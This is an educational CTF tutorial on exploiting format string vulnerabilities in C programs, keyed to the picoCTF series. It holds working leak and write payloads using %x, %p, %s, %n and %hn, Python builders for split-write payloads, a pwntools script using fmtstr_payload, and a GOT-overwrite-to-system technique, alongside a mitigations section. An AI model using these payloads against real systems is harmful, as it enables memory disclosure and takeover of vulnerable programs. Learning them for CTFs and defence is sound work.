April 12, 2026

Format String Vulnerabilities for CTF Binary Exploitation

A beginner-friendly guide to format string vulnerabilities in CTF binary exploitation: how printf leaks memory, finding the format string offset, writing arbitrary values with %n, and walking through the picoCTF format string series.

Introduction

A format string vulnerability occurs when a C program passes user-controlled input directly as the first argument to printf or a related function. Instead of treating the input as data to print, printf interprets it as a format string and acts on any % specifiers it contains. An attacker can use this to read arbitrary memory and, in some cases, write to any address in the process.

This vulnerability class is at the heart of the picoCTF format string series: format string 0, format string 1, format string 2, and format string 3. Each challenge adds one more concept. Work through them in order.

How printf works

The printf family of functions reads a format string and consumes additional arguments from the call stack to fill in each format specifier. When called correctly it looks like this:

printf("%s scored %d points", username, score);
// The format string is a string literal, not user input.

The vulnerable version passes user input as the format string:

char buf[256];
fgets(buf, sizeof(buf), stdin);
printf(buf); // BUG: buf is user-controlled

When printf encounters %s in the format string, it fetches the next argument (a pointer to a string) and dereferences it. If the caller never provided that argument, printf reads whatever happens to be in that argument slot: a stack word on 32-bit x86, or a leftover register value followed by stack words on x86-64. Either way, the attacker gets to read process memory.

Note: The vulnerability requires that the attacker controls the format string. If printf("%s", buf) is used instead, the input is always treated as a plain string and no specifiers are interpreted.
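To make the mechanism concrete, here is a toy Python model of how printf walks its argument slots. It is only a sketch and not how libc is implemented: toy_printf and the sample slot values are made up for illustration, and it understands nothing except %x and %%.

```python
def toy_printf(fmt, slots):
    """Toy model: every %x consumes the next argument slot, supplied or not."""
    out = []
    next_slot = 0
    i = 0
    while i < len(fmt):
        if fmt.startswith("%x", i):
            # printf has no idea how many arguments the caller really passed.
            out.append(format(slots[next_slot], "x"))
            next_slot += 1
            i += 2
        elif fmt.startswith("%%", i):
            out.append("%")
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)

# Hypothetical leftover values sitting in the argument slots.
slots = [0xf7f9e580, 0x0, 0x0, 0xdeadbeef]

# The "user input" is used as the format string, as in printf(buf).
user_input = "%x %x %x %x"
leaked = toy_printf(user_input, slots)
print(leaked)
```

The caller passed no arguments at all, yet four values come out. That is the whole bug in miniature.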

Reading memory with %x and %s

Send %x specifiers to dump stack values as hex integers. Each %x consumes one word from the stack:

$ echo '%x %x %x %x %x %x %x %x' | ./vulnerable
f7f9e580 0 0 0 f7f5a700 25207825 78252078 20782520

Use %p instead of %x on 64-bit systems: %x prints only the low 32 bits of each 8-byte slot, while %p prints the full pointer-width value with a 0x prefix:

$ echo '%p %p %p %p %p %p' | ./vulnerable

If you want to read from a specific stack offset without cycling through all the preceding ones, use the positional argument syntax %N$x where N is the index:

$ echo '%6$x' | ./vulnerable # read the 6th stack word
$ echo '%6$p' | ./vulnerable # same, as a pointer

To dereference a pointer on the stack and read the string it points to, use %s:

$ echo '%6$s' | ./vulnerable # dereference the 6th stack word as a string

Warning: %s will crash the program if the value at the target position is not a valid readable pointer. Use %x or %p first to identify which positions hold addresses, then dereference specific ones.
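Leaked words are little-endian integers, so any text sitting on the stack comes out as hex with the bytes of each word reversed. The sketch below turns a line of %x or %p output back into raw bytes. The helper name words_to_bytes is made up for this example, and it assumes every token is a hex number or glibc's "(nil)".

```python
import struct

def words_to_bytes(leak, word_size=4):
    """Convert space-separated hex words from %x / %p output into raw bytes."""
    fmt = "<I" if word_size == 4 else "<Q"  # little-endian 32-bit or 64-bit
    out = b""
    for token in leak.split():
        # glibc prints a NULL pointer as "(nil)" when using %p.
        value = 0 if token == "(nil)" else int(token, 16)
        out += struct.pack(fmt, value)
    return out

# Two words from the 32-bit dump shown earlier.
print(words_to_bytes("25207825 78252078"))

# A 64-bit word as printed by %p.
print(words_to_bytes("0x4141414141414141", word_size=8))
```

The first call recovers the start of the format string itself, which is a good sign that you have reached your own buffer.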

Finding the format string offset

The key skill in format string exploitation is finding the offset at which your own input appears on the stack. Once you know it, you can place an address in the input and use %N$s to dereference it, or %N$n to write to it.

The technique is to start the input with a recognizable marker like AAAA (hex value 0x41414141) and then scan the stack output for that value:

$ echo 'AAAA %x %x %x %x %x %x %x %x %x %x' | ./vulnerable
AAAA f7f9e580 0 0 0 f7f5a700 41414141 20782520 ...
#                            ^^^^^^^^
#                            This is our AAAA, at position 6

In the example above, our marker appears at the 6th position. We can confirm this with:

$ echo 'AAAA %6$x' | ./vulnerable
AAAA 41414141 # confirmed: offset is 6

On 64-bit systems, use 8-byte markers (e.g. AAAAAAAA, hex 0x4141414141414141) and look for them in the %p output.
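Scanning the output by eye gets tedious, so here is a small sketch that does the search for you. The function name find_offset is hypothetical, and it assumes the program echoes the marker first and then prints one leaked word per specifier, separated by spaces.

```python
def find_offset(output, marker="AAAA"):
    """Return the 1-based position whose value equals the marker, or None."""
    target = int.from_bytes(marker.encode(), "little")
    # Drop the echoed marker so it is not mistaken for a leaked hex word.
    leaked = output[len(marker):] if output.startswith(marker) else output
    for position, token in enumerate(leaked.split(), start=1):
        try:
            value = int(token, 16)
        except ValueError:
            continue  # "(nil)" or other non-hex text still occupies a position
        if value == target:
            return position
    return None

# 32-bit output in the style of the example above.
print(find_offset("AAAA f7f9e580 0 0 0 f7f5a700 41414141"))

# 64-bit output from %p with an 8-byte marker (made-up values).
print(find_offset("AAAAAAAA 0x1 (nil) 0x4141414141414141", marker="AAAAAAAA"))
```

Whatever position it reports, confirm it with a positional specifier such as %6$x before building a payload on top of it.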

Writing with %n

The %n specifier prints nothing. Instead, it takes the next argument as a pointer to an int and stores the number of bytes printed so far at that address. This turns a read vulnerability into an arbitrary write: if you can place a target address at a known stack offset, %N$n will write to it.

The value written equals the number of characters already output by printf. Use width padding to control it. For example, to write the value 100 (0x64):

# Payload: print exactly 100 characters, then write the count with %n.
# Assumes the target address already sits at stack offset 6
# and that nothing else is printed before the padding.
%100c%6$n
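In practice the target address usually travels inside your own input, and those bytes are printed too, so they count toward the total. The sketch below builds a single-write payload for a 32-bit target under that assumption. The function name and the address 0x0804c02c are placeholders, and the address must not contain null or newline bytes for the payload to arrive intact.

```python
import struct

def single_write_payload(addr, value, offset):
    """32-bit payload: address first, then padding, then a positional %n."""
    prefix = struct.pack("<I", addr)  # 4 bytes, printed before the padding
    pad = value - len(prefix)
    if pad < 0:
        raise ValueError("value is smaller than the bytes already printed")
    padding = f"%{pad}c".encode() if pad else b""
    return prefix + padding + f"%{offset}$n".encode()

# Write 100 (0x64) to a placeholder address found at stack offset 6.
payload = single_write_payload(0x0804c02c, 100, 6)
print(payload)
```

The padding drops from 100 to 96 because the four address bytes have already been printed by the time %n runs.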

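Writing a large value such as a function address with a single %n would mean printing that many characters, which can easily be over a hundred million. Instead, split the write into smaller pieces: %hn writes 2 bytes at a time and %hhn writes 1 byte, each aimed at a different part of the target. This is the basis of the GOT (Global Offset Table) overwrite technique used in format string 3.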
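The padding arithmetic for a split write is easy to get wrong by hand, so here is a minimal sketch for a 32-bit target. It writes the value as two halves with %hn, lowest half first, because the printed-byte counter can only go up. The function name, the target address, and the value are all placeholders. It assumes the two addresses sit at the very start of your buffer and contain no null or newline bytes.

```python
import struct

def hn_payload(addr, value, offset):
    """Write a 32-bit value as two 2-byte halves using positional %hn."""
    # Little-endian: the low half lives at addr, the high half at addr + 2.
    halves = [(value & 0xffff, offset), ((value >> 16) & 0xffff, offset + 1)]
    payload = struct.pack("<I", addr) + struct.pack("<I", addr + 2)
    printed = len(payload)  # the 8 address bytes are printed first
    for half, position in sorted(halves):
        # %hn keeps only the low 16 bits of the count, so wrap modulo 0x10000.
        delta = (half - printed) % 0x10000
        if delta:
            payload += f"%{delta}c".encode()
        payload += f"%{position}$hn".encode()
        printed += delta
    return payload

# Placeholder target: store 0x080491f6 at 0x0804c010, buffer at offset 6.
payload = hn_payload(0x0804c010, 0x080491f6, 6)
print(payload)
```

Here the high half (0x0804) is smaller than the low half (0x91f6), so it is written first through position 7, and the low half follows through position 6.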

Tip: Use checksec (bundled with pwntools) to check whether the binary has RELRO. Full RELRO makes the GOT read-only after dynamic linking, preventing GOT overwrites. Partial RELRO, which is common in CTF binaries, leaves the function-pointer part of the GOT writable.

Automating with pwntools

pwntools is a Python library for writing exploit scripts. It handles process I/O, socket connections, and format string payload generation:

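pip install pwntools

from pwn import *

# Connect to a local process or remote server
p = process('./vulnerable')
# p = remote('challenge.picoctf.org', 12345)

# Send a format string to leak stack values
p.sendline(b'%p %p %p %p %p %p')
leak = p.recvline()
print(leak)

# Placeholders: replace these with the values for your target binary
context.arch = 'i386'      # or 'amd64'; sets the pointer size used in the payload
offset = 6                 # the stack index where your buffer appears
target_addr = 0x0804c010   # placeholder: address to overwrite
target_value = 0x64        # placeholder: value to write there

# Build a format string payload that writes target_value to target_addr
payload = fmtstr_payload(offset, {target_addr: target_value})
p.sendline(payload)
p.interactive()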

The fmtstr_payload function from pwntools builds the entire payload for you, handling the address placement, padding arithmetic, and split writes needed to overwrite arbitrary memory. The only inputs you need are the stack offset and a dictionary of address: value pairs to write.

The picoCTF format string series

format string 0: Introduces the bug conceptually. A buffer overflow of a format string crashes the program in the right way to print the flag. No memory reading required.

format string 1: Read a secret value off the stack using %x specifiers. Practice scanning for a recognizable pattern in the leak output.

format string 2: Overwrite a specific variable in memory using %n. Introduces the concept of writing to a known address by placing it in the input buffer.

format string 3: Full GOT overwrite. Redirect a library function pointer to system so that the next call to the original function instead spawns a shell.

Mitigations

Modern compilers and operating systems include several defenses against format string exploits:

  • -Wformat-security: GCC warns when printf is called with a non-literal format string and no further arguments. It only takes effect together with -Wformat. Debian and Ubuntu package builds enable it.
  • Full RELRO: marks the GOT read-only after dynamic linking, preventing GOT overwrites.
  • ASLR: randomizes where the stack and libraries are loaded, so target addresses cannot be hardcoded. An attacker has to leak an address first.
  • Stack canaries: detect contiguous stack buffer overflows, but do not stop format string writes, which go straight to the chosen address.

Tip: Run checksec ./binary (pwntools) to see which mitigations are active on a CTF binary. Partial RELRO with no PIE is the classic easy-mode setup; Full RELRO with PIE and ASLR requires leaking an address before writing.
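When ASLR is on, the leak step comes down to simple arithmetic: subtract the known offset of the leaked symbol to get the library base, then add the offset of the function you want. The sketch below shows that calculation. Every number in it is invented for illustration; real offsets come from the exact libc the challenge uses.

```python
def resolve_address(leaked_addr, leaked_symbol_offset, wanted_offset):
    """Turn one leaked libc address into the runtime address of another symbol."""
    libc_base = leaked_addr - leaked_symbol_offset
    # Libraries are mapped on page boundaries, so a valid base ends in 000.
    if libc_base & 0xfff:
        raise ValueError("base is not page-aligned: wrong offset or wrong libc?")
    return libc_base + wanted_offset

# Hypothetical values, not taken from any real libc.
LEAKED_SYMBOL_OFFSET = 0x7a3f0   # offset of the leaked function inside libc
SYSTEM_OFFSET = 0x4f760          # offset of system inside the same libc
leaked_addr = 0x7f3a1c27a3f0     # address recovered at runtime from the leak

system_addr = resolve_address(leaked_addr, LEAKED_SYMBOL_OFFSET, SYSTEM_OFFSET)
print(hex(system_addr))
```

The page-alignment check is a cheap sanity test: if the base does not end in three zero hex digits, the leak or the libc version is probably wrong.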

Quick reference

Specifier                          Effect
%x                                 Print the next stack word as hex
%p                                 Print the next stack word as a pointer (0x...)
%s                                 Dereference the next stack word as a string pointer
%n                                 Write the bytes-printed count to the address held in the next stack word
%hn                                Same as %n, but write 2 bytes (short) instead of 4
%hhn                               Same as %n, but write 1 byte
%N$x                               Print the Nth stack word (1-indexed) as hex
%Nc                                Print one character padded to width N (controls the value %n writes)
fmtstr_payload(off, {addr: val})   pwntools: build a complete write payload